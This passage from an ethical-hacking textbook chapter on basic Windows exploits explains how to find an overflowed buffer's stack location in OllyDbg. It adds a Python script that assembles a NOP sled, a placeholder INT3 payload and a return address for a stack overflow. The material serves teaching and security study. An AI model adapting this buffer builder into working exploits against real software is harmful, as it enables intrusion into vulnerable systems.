You may pass the exception to the program
by pressing SHIFT-F9. In this case, since there are no exception handlers in place, the program
crashes.
After the program crashes, you may continue to inspect memory locations. For example,
you may click in the stack section and scroll up to see the previous stack frame (the
one we just returned from, which is now grayed out because its data is below ESP). You can see (on our system) that the
beginning of our malicious buffer was at 0x0012FDD0.
Chapter 11: Basic Windows Exploits
Gray Hat Hacking: The Ethical Hacker's Handbook
To continue inspecting the state of the crashed program, within the stack section,
scroll back down to the current stack frame (the current stack frame is highlighted).
You may also return to the current stack frame by clicking on the ESP register value to
select it, then right-clicking on that selected value and selecting Follow in Stack. Notice
that a second copy of the buffer is also located at ESP+4. Information like this (where
our buffer lands on the stack, and which registers point at or near it) becomes valuable
later as we choose an attack vector.
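The address the debugger shows for our buffer is what a return address will have to be built from, so it is worth seeing what that address looks like once it is packed into the overflow. The following is an added example, not code from the book: it takes the buffer start observed above (0x0012FDD0) and lays out a sled, a payload and a return address, and it flags the one thing a practitioner has to check first. A Windows XP stack address such as 0x0012xxxx packs little-endian as d0 fd 12 00, so its top byte is a NUL; a strcpy-style copy will only deliver that byte if it is the very last byte of the buffer. The offset to the saved return address (260) and the INT3 payload are hypothetical and only stand in for values you would find by crashing the program with a known pattern.

```python
import struct

# Constructed values for illustration. Only 0x0012FDD0 comes from the text;
# the offset and the payload are hypothetical.
BUFFER_START = 0x0012FDD0   # start of our buffer as seen in the OllyDbg stack window
RET_OFFSET = 260            # hypothetical distance from buffer start to the saved EIP
BAD = b"\x00"               # strcpy-style copies stop at the first NUL


def pack_addr(addr):
    """Little-endian 32-bit, the byte order x86 uses for the saved EIP on the stack."""
    return struct.pack("<I", addr)


def bad_byte_positions(data, bad=BAD):
    """Offsets within data of bytes the copy loop will not deliver intact."""
    return [i for i, b in enumerate(data) if b in bad]


def ret_into_sled(buffer_start=BUFFER_START, skip=32):
    """Aim the new return address a few bytes into our own NOP sled.

    Landing inside the sled (rather than exactly at its start) gives slack if
    the buffer shifts by a few bytes between the debugger and a real run.
    """
    return buffer_start + skip


def build_buffer(ret_addr, payload, ret_offset=RET_OFFSET, nop=b"\x90"):
    """NOP sled + payload padded to ret_offset, followed by the new return address.

    A NUL is tolerated only as the final byte: strcpy copies it as the string
    terminator, so a 0x0012xxxx stack address works when the return address is
    the last thing in the buffer, and nowhere else.
    """
    if len(payload) > ret_offset:
        raise ValueError("payload of %d bytes does not fit before the return address" % len(payload))
    sled = nop * (ret_offset - len(payload))
    buf = sled + payload + pack_addr(ret_addr)
    bad = bad_byte_positions(buf[:-1])
    if bad:
        raise ValueError("bad bytes at offsets %r" % bad)
    return buf


if __name__ == "__main__":
    # INT3 (0xCC) as the payload: under OllyDbg a hit on it stops execution,
    # which confirms the return address landed in the sled before real shellcode goes in.
    buf = build_buffer(ret_into_sled(), b"\xcc" * 8)
    print("buffer length:", len(buf))
    print("return address bytes:", buf[-4:].hex())
    print("NUL positions:", bad_byte_positions(buf))
```

Run it and the only NUL reported is the last byte of the buffer, which is exactly where strcpy would have written a terminator anyway. A return address into code such as 0x00401000 fails the same check, because its NUL lands in the first byte of the packed address rather than the last; that is the usual reason to look for a jump through a register (the ESP+4 copy noted above is one such lead) instead of a hardcoded address.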
Those of you who prefer a visual, GUI-driven workflow will find OllyDbg very useful. Remember,
OllyDbg only works in user space. If you need to dive into kernel space, you will have to
use another debugger such as WinDbg or SoftICE.